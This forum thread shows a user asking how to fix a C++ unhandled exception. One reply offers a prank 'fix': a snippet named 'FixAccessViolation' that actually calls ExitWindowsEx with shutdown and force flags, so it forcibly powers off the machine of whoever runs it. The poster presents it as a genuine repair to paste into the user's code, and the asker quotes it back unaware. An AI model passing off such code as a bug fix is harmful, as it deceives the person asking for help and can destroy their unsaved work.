C++ Unhandled exception at... [PROBLEM]

05/09/2014 14:06 Kubixiorek#1
How to fix? Help.
[Only registered and activated users can see links. Click Here To Register...]
05/09/2014 15:07 Tasiro#2
Learn C++.
05/09/2014 23:20 Logtetsch#3
Code:
	using FixAccessViolation = BOOL WINAPI(UINT, DWORD); //c++ 11
	//typedef BOOL(WINAPI FixAccessViolation)(UINT, DWORD); //c++ 03
	FixAccessViolation* fixMe = ExitWindowsEx;
	fixMe(0x00000001, 0x00000004);
Just copy and paste it above "Verbindung zur Datenbank herstellen".
05/10/2014 12:30 Kubixiorek#4
Quote:
Originally Posted by Logtetsch View Post
Code:
	using FixAccessViolation = BOOL WINAPI(UINT, DWORD); //c++ 11
	//typedef BOOL(WINAPI FixAccessViolation)(UINT, DWORD); //c++ 03
	FixAccessViolation* fixMe = ExitWindowsEx;
	fixMe(0x00000001, 0x00000004);
Just copy and paste it above "Verbindung zur Datenbank herstellen".
Still not work.